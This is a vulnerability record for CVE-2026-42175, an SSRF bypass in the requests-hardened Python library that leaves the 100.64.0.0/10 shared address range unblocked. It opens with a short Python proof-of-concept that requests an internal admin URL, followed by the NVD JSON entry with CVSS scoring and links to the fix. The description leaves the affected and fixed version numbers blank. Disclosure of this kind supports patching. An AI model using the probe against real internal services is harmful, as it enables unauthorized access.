CVE-2026-42175

import requests_hardened # Vulnerability: SSRF bypass via RFC 6598 Shared Address Space # The library fails to block IPs in the 100.64.0.0/10 range. target_ip = "100.64.0.1" # Example IP in the vulnerable range malicious_url = f"http://{target_ip}/admin/config" try: # In vulnerable versions, this SSRF request succeeds response = requests_hardened.get(malicious_url, timeout=5) if response.status_code == 200: print(f"[+] SSRF Successful! Accessed internal service at {target_ip}") print(f"[+] Response: {response.text[:100]}") else: print(f"[-] Request returned status code: {response.status_code}") except Exception as e: print(f"[-] Exploit failed or connection blocked: {e}")

{"cve": {"id": "CVE-2026-42175", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:24.073", "lastModified": "2026-05-13T18:24:31.310", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "requests-hardened is a library that overrides the default behaviors of the requests library, and adds new security features. Prior to , the SSRF protection in requests-hardened fails to block IP addresses within the RFC 6598 Shared Address Space (100.64.0.0/10). An attacker who can supply arbitrary URLs to requests-hardened could exploit this gap to access internal services hosted within 100.64.0.0/10. This is for example relevant in environments such as AWS EKS where 100.64.0.0/10 is commonly used as the default pod CIDR. The impact is environment-dependent, deployments that utilize the affected CIDR range for internal networking are exposed to SSRF bypass, while others may not be affected. This vulnerability is fixed in ."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "references": [{"url": "https://github.com/saleor/requests-hardened/commit/a266b3958bb142bca515b3c230fdea19fbda327c", "source": "[email protected]"}, {"url": "https://github.com/saleor/requests-hardened/commit/b7403f88d3b3689e57435b75b51691a160aaeef5", "source": "[email protected]"}, {"url": "https://github.com/saleor/requests-hardened/releases/tag/v1.2.1", "source": "[email protected]"}, {"url": "https://github.com/saleor/requests-hardened/security/advisories/GHSA-vh75-fwv3-pqrh", "source": "[email protected]"}]}}